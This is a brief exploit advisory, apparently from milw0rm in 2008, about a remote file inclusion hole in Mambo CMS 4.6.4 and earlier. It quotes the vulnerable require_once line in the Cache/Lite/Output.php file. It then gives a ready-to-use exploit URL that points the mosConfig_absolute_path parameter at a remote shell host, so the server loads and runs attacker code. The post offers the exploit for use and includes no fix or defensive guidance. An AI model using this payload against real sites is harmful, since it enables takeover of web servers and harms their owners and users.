.-----------------------------------------------------------------------------. | vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability | | download: http://mambo-foundation.org/ | | | | author: irk4z@yahoo.pl | | homepage: http://irk4z.wordpress.com/ | | | | greets to: all friends ;) | '-----------------------------------------------------------------------------' # code: /includes/Cache/Lite/Output.php : 1 12 */ 13 14 require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php'); ... ^ no comment.. RFI in line 14.. # exploit: http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell? # milw0rm.com [2008-06-13]